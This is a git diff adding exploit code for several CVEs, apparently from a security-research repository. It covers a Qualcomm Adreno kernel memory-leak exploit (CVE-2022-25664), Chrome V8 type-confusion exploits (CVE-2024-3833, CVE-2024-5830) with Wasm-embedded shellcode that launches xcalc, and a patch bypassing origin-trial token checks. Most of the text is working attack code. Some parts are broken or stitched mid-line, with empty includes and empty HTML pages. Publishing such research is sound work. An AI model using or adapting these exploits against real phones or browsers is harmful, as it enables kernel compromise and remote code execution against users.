< 0) err(1, "io_setup error\n"); + if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) { + err(1, "kgsl_map failed (shared_mem_buf2)"); + } + + if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) { + err(1, "gpu_command failed."); + } + usleep(150000); + if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) { + err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr); + } + if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) { + err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx); + } + + int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH); + if (ret == -1) { + io_destroy(ctx); + munmap(shared_mem_buf2, 0x1000); + munmap(shared_mem_buf, 0x2000); + munmap(write_cmd_buf, 0x1000); + for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]); + for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]); + close(fd); + } + return ret; +} + +int main() { + + for (int i = 0; i < MMAP_SPRAY; i++) { + mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + } + int success = -1; + int counter = 0; + while (success == -1) { + success = find_address(); + counter++; + if (counter % 20 == 0) printf("failed after %d\n", counter); + } + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h new file mode 100644 index 0000000..b103107 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h @@ -0,0 +1,94 @@ +#ifndef DMA_SEARCH_H +#define DMA_SEARCH_H + +#include +#include + +#define OBJECT_SIZE 128 + +#define STRIDE (OBJECT_SIZE/8) + +struct dma_info { + uint64_t ops; + uint64_t cb_list; + uint64_t spinlock; + uint64_t context; +}; + +enum dma_search_type { + KERNEL_4, + KERNEL_5 +}; + +int try_match_object_54(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //cb_list not initialized + if (obj[2] != obj[3]) return 0; + //no cb_list + if (obj[2] == 0 || obj[3] == 0) return 0; + if (out->ops == 0) { + out->ops = obj[1]; + out->cb_list = obj[2]; + out->context = obj[4]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + return 1; +} + +int try_match_object_414(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //rcu not zero + if (obj[2] != 0 || obj[3] != 0) return 0; + //cb_list not initialized + if (obj[4] != obj[5]) return 0; + //no cb_list + if (obj[4] == 0 || obj[5] == 0) return 0; + //no spinlock + if (obj[6] == 0) return 0; + if (out->ops == 0) { + out->ops = obj[1]; + out->cb_list = obj[4]; + out->spinlock = obj[6]; + out->context = obj[7]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + if (out->spinlock != obj[6]) { + printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]); + return 0; + } + return 1; +}; + +int dma_search(uint64_t* region, size_t len, enum dma_search_type type) { + if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n"); + struct dma_info info = {0}; + int match = 0; + for (int i = 0; i < len; i+= STRIDE) { + if (type == KERNEL_4) { + match += try_match_object_414(region + i, &info); + } else if (type == KERNEL_5){ + match += try_match_object_54(region + i, &info); + } else { + err(1, "unknown kernel branch\n"); + } + } + if (match > 3) { + printf("found dma fence object:\n"); + printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops); + printf("object address: %lx\n", info.cb_list); + return 1; + } + return -1; +}; + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c new file mode 100644 index 0000000..1fc3c5a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c @@ -0,0 +1,80 @@ +#include + +#include "kgsl_utils.h" + +int kgsl_ctx_create(int fd, uint32_t *ctx_id) +{ + struct kgsl_drawctxt_create req = { + .flags = 0x00001812, + }; + int ret; + + ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req); + if (ret) + return ret; + + *ctx_id = req.drawctxt_id; + + return 0; +} + +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) { + struct kgsl_command_object *cmds; + + struct kgsl_gpu_command req = { + .context_id = ctx_id, + .cmdsize = sizeof(struct kgsl_command_object), + .numcmds = n, + }; + size_t cmds_size; + uint32_t i; + + cmds_size = n * sizeof(struct kgsl_command_object); + + cmds = (struct kgsl_command_object *) malloc(cmds_size); + + if (cmds == NULL) { + return -1; + } + + memset(cmds, 0, cmds_size); + + for (i = 0; i < n; i++) { + cmds[i].flags = KGSL_CMDLIST_IB; + + if (i == target_idx) { + cmds[i].gpuaddr = target_cmd; + cmds[i].size = target_size; + } + else { + /* the shift here is helpful for debugging failed alignment */ + cmds[i].gpuaddr = gpuaddr + (i << 16); + cmds[i].size = cmdsize; + } + } + req.cmdlist = (unsigned long) cmds; + return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); +} + +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) { + struct kgsl_map_user_mem req = { + .len = len, + .offset = 0, + .hostptr = addr, + .memtype = KGSL_USER_MEM_TYPE_ADDR, +// .flags = KGSL_MEMFLAGS_USE_CPU_MAP, + }; + if (readonly) { + req.flags |= KGSL_MEMFLAGS_GPUREADONLY; + } + int ret; + + ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req); + if (ret) + return ret; + + *gpuaddr = req.gpuaddr; + + return 0; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h new file mode 100644 index 0000000..79033dc --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h @@ -0,0 +1,237 @@ +#ifndef KGSL_UTILS_H +#define KGSL_UTILS_H + +#include +#include +#include + +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +#define KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + /* + * ION type is retained for backwards compatibility but Ion buffers are + * dma-bufs so try to use that naming if we can + */ + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_timeline_fence_get { + __u64 seqno; + __u32 timeline; + int handle; +}; + +#define IOCTL_KGSL_TIMELINE_FENCE_GET \ + _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get) + + +struct kgsl_timeline_create { + __u64 seqno; + __u32 id; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create) + +#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy { + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +struct kgsl_gpuobj_import { + uint64_t __user priv; + uint64_t priv_len; + uint64_t flags; + unsigned int type; + unsigned int id; +}; + +struct kgsl_gpuobj_import_dma_buf { + int fd; +}; + +struct kgsl_gpuobj_import_useraddr { + uint64_t virtaddr; +}; + +struct kgsl_gpuobj_free { + uint64_t flags; + uint64_t __user priv; + unsigned int id; + unsigned int type; + unsigned int len; +}; + +#define KGSL_GPUOBJ_FREE_ON_EVENT 1 + +#define KGSL_GPU_EVENT_TIMESTAMP 1 +#define KGSL_GPU_EVENT_FENCE 2 + +struct kgsl_gpu_event_timestamp { + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_gpu_event_fence { + int fd; +}; + +struct kgsl_gpumem_free_id { + unsigned int id; +/* private: reserved for future use*/ + unsigned int __pad; +}; + +#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id) + +#define IOCTL_KGSL_GPUOBJ_FREE \ + _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free) + +struct dma_buf_sync { + __u64 flags; +}; + +#define DMA_BUF_SYNC_READ (1 << 0) +#define DMA_BUF_SYNC_WRITE (2 << 0) +#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE) +#define DMA_BUF_SYNC_START (0 << 2) +#define DMA_BUF_SYNC_END (1 << 2) +#define DMA_BUF_SYNC_USER_MAPPED (1 << 3) + +#define DMA_BUF_SYNC_VALID_FLAGS_MASK \ + (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END) + +#define DMA_BUF_BASE 'b' +#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync) + +#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL + + +struct kgsl_syncsource_create { + unsigned int id; +/* private: reserved for future use */ + unsigned int __pad[3]; +}; + +#define IOCTL_KGSL_SYNCSOURCE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create) + +struct kgsl_syncsource_create_fence { + unsigned int id; + int fence_fd; +/* private: reserved for future use */ + unsigned int __pad[4]; +}; + +/** + * struct kgsl_syncsource_signal_fence - Argument to + * IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE + * @id: syncsource id + * @fence_fd: sync_fence fd to signal + * + * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE + * call using the same syncsource id. This allows a fence to be shared + * to other processes but only signaled by the process owning the fd + * used to create the fence. + */ +#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \ + _IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence) + +int kgsl_ctx_create(int fd, uint32_t *ctx_id); +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size); +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h new file mode 100644 index 0000000..7224cc6 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h @@ -0,0 +1,218 @@ +#ifndef ADRENO_H +#define ADRENO_H + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy { + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + + +#define PT_BASE 0xfc000000 +#define KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +struct kgsl_gpumem_free_id { + unsigned int id; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_sharedmem_free { + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_SHAREDMEM_FREE \ + _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free) + +static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +static inline uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +static inline uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +static inline uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +static inline uint cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +static inline int _adreno_iommu_add_idle_indirect_cmds( + unsigned int *cmds) +{ + unsigned int *start = cmds; + cmds += cp_wait_for_me(cmds); + *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1); + cmds += cp_gpuaddr(cmds, 0xfc000000+1024); + *cmds++ = 2; + cmds += cp_wait_for_idle(cmds); + return cmds - start; +} + +static inline uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +static inline uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, size); +} + +static inline uint cp_invalidate_state( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3); + *cmds++ = 0x40000; + *cmds++ = 0; + *cmds++ = 0; + + return cmds - start; +} + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c new file mode 100644 index 0000000..ba980e8 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c @@ -0,0 +1,221 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "adreno.h" + +#define LEAK_SIZE 100 + +#define COMMAND_SIZE 4 + +static void hexdump(void *_data, size_t byte_count) { + printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count); + for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) { + unsigned char *bytes = ((unsigned char*)_data) + byte_offset; + uint64_t line_bytes = (byte_count - byte_offset > 16) ? + 16 : (byte_count - byte_offset); + char line[1000]; + char *linep = line; + linep += sprintf(linep, "%08lx ", byte_offset); + for (int i=0; i<16; i++) { + if (i >= line_bytes) { + linep += sprintf(linep, " "); + } else { + linep += sprintf(linep, "%02hhx ", bytes[i]); + } + } + linep += sprintf(linep, " |"); + for (int i=0; i> 1); + console.log("func Addr: " + funcAddr.toString(16)); + var dblOffset = (oobDbl2Index - oobDblIndex - 5) >> 1; + var codeAddr = read(funcAddr + 0x10, dblOffset)[0]; + console.log("code Addr: " + codeAddr.toString(16)); + var maglevAddr = read(codeAddr + 0x8, dblOffset); + console.log("maglev Addr: " + maglevAddr[0].toString(16) + " " + maglevAddr[1].toString(16)); + write(codeAddr + 0x8, maglevAddr[0] + 0x80 + 2, maglevAddr[1], dblOffset); + func(); +} diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md b/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md new file mode 100644 index 0000000..d06634c --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md @@ -0,0 +1,23 @@ +## V8 type confusion CVE-2024-3833 + +The analysis of this bug can be found [here](https://github.blog/2024-06-26-attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties). + +The exploit here is tested on the official build of Chrome version 123.0.6312.58, on Ubuntu 22.04. The following build config was used to build Chromium: + +``` +is_debug = false +symbol_level = 1 +blink_symbol_level = 1 +dcheck_always_on = false +is_official_build = true +chrome_pgo_phase = 0 +v8_symbol_level = 1 +``` + +The bug depends on an origin trial and to emulate it locally, the patch `trial-token.patch` should be applied before building Chrome. + +If successful, on Ubuntu 22.04, it should call launch `xcalc` when `wasm_poc.html` is opened in Chrome. + +Shell code and some addresses may need changing on other platforms. + + diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js b/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js new file mode 100644 index 0000000..86cc811 --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/import_shell.js @@ -0,0 +1,91 @@ +d8.file.execute("/home/mmo/chrome_pocs/v8_test/wasm/wasm-module-builder.js"); + +const importObject = { + imports: { imported_func : Math.sin}, +}; + + +var builder = new WasmModuleBuilder(); +let array = builder.addArray(kWasmF64, true); + +var sig_index = builder.addType(kSig_d_d); + +builder.addImport("imports", "imported_func", sig_index); +builder.addFunction("main", sig_index) + .addBody([kExprLocalGet, 0, kExprCallFunction, 0]) + .exportAs("main"); +//jumps: 0x45, 0x48 for d8 +//0x1d, 0x20 for chrome +builder.addFunction("make_array", makeSig([], [wasmRefNullType(array)])) + .addLocals(wasmRefNullType(array), 1) + .addBody([kExprI32Const, 18, kGCPrefix, kExprArrayNewDefault, array, kExprLocalSet, 0, + kExprLocalGet, 0, + kExprI32Const, 0, + kExprF64Const, 0x31, 0xf6, 0x31, 0xd2, 0x31, 0xc0, 0xeb, 0x1d, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 1, + kExprF64Const, 0x68, 0x6c, 0x63, 0x00, 0x00, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 2, + kExprF64Const, 0x68, 0x2f, 0x78, 0x63, 0x61, 0x58, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 3, + kExprF64Const, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x5b, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 4, + kExprF64Const, 0x90, 0x90, 0x48, 0xc1, 0xe0, 0x20, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 5, + kExprF64Const, 0x48, 0x01, 0xd8, 0x50, 0x54, 0x5f, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 6, + kExprF64Const, 0x56, 0x57, 0x54, 0x5e, 0x90, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 7, + kExprF64Const, 0x68, 0x3a, 0x30, 0x2e, 0x30, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 8, + kExprF64Const, 0x68, 0x4c, 0x41, 0x59, 0x3d, 0x58, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 9, + kExprF64Const, 0x68, 0x44, 0x49, 0x53, 0x50, 0x5b, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 10, + kExprF64Const, 0x90, 0x48, 0xc1, 0xe0, 0x20, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 11, + kExprF64Const, 0x48, 0x01, 0xd8, 0x50, 0x54, 0x90, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 12, + kExprF64Const, 0x41, 0x5a, 0x52, 0x41, 0x52, 0x54, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 13, + kExprF64Const, 0x5a, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0, + kExprI32Const, 14, + kExprF64Const, 0x0f, 0x05, 0x5a, 0x31, 0xd2, 0x52, 0xeb, 0x20, + kGCPrefix, kExprArraySet, array, + kExprLocalGet, 0]) + .exportFunc(); + +var wasmBuffer = builder.toBuffer(false); +var bufStr = '[' +for (let i = 0; i < wasmBuffer.length - 1; i++) { + bufStr += wasmBuffer[i] + ','; +} +bufStr += wasmBuffer[wasmBuffer.length - 1] + ']'; +console.log(bufStr); diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch b/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch new file mode 100644 index 0000000..ba36da5 --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch @@ -0,0 +1,31 @@ +diff --git a/third_party/blink/common/origin_trials/trial_token.cc b/third_party/blink/common/origin_trials/trial_token.cc +index e3a28923fce19..70c24dd445066 100644 +--- a/third_party/blink/common/origin_trials/trial_token.cc ++++ b/third_party/blink/common/origin_trials/trial_token.cc +@@ -116,6 +116,17 @@ OriginTrialTokenStatus TrialToken::Extract( + std::string* out_token_payload, + std::string* out_token_signature, + uint8_t* out_token_version) { ++ ++ if (token_text.length() > kMaxTokenSize || public_key.size() == 0 || token_text.length() < kPayloadOffset) { ++ return OriginTrialTokenStatus::kMalformed; ++ } ++ ++ *out_token_payload = token_text; ++ *out_token_signature = "1234"; ++ *out_token_version = kVersion2; ++ return OriginTrialTokenStatus::kSuccess;; ++ ++/* + if (token_text.empty()) { + return OriginTrialTokenStatus::kMalformed; + } +@@ -178,6 +189,7 @@ OriginTrialTokenStatus TrialToken::Extract( + *out_token_payload = token_contents.substr(kPayloadOffset, payload_length); + *out_token_signature = std::string(signature); + return OriginTrialTokenStatus::kSuccess; ++ */ + } + + // static +-- diff --git a/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html b/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html new file mode 100644 index 0000000..03013d8 --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_3833/wasm_poc.html @@ -0,0 +1,201 @@ + + + + + diff --git a/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md b/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md new file mode 100644 index 0000000..c4886cc --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md @@ -0,0 +1,21 @@ +## V8 type confusion CVE-2024-5830 + +The analysis of this bug can be found [here](https://github.blog/2024-08-13-from-object-transition-to-rce-in-the-chrome-renderer). + +The exploit here is tested on the official build of Chrome version 125.0.6422.112, on Ubuntu 22.04. The following build config was used to build Chromium: + +``` +is_debug = false +symbol_level = 1 +blink_symbol_level = 1 +dcheck_always_on = false +is_official_build = true +chrome_pgo_phase = 0 +v8_symbol_level = 1 +``` + +If successful, on Ubuntu 22.04, it should call launch `xcalc` when `calc.html` is opened in Chrome. + +Shell code and some addresses may need changing on other platforms. + + diff --git a/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html b/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html new file mode 100644 index 0000000..6370e6d --- /dev/null +++ b/SecurityExploits/Chrome/v8/CVE_2024_5830/calc.html @@ -0,0 +1,197 @@ + + + + + diff --git a/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff new file mode 100644 index 0000000..8104f7d --- /dev/null +++ b/SecurityExploits/DjVuLibre/MMRDecoder_scanruns_CVE-2025-53367/DjVuLibre-poc-CVE-2025-53367.diff @@ -0,0 +1,1883 @@ +diff --git a/config/acinclude.m4 b/config/acinclude.m4 +index 19b7e6e..472cf07 100644 +--- a/config/acinclude.m4 ++++ 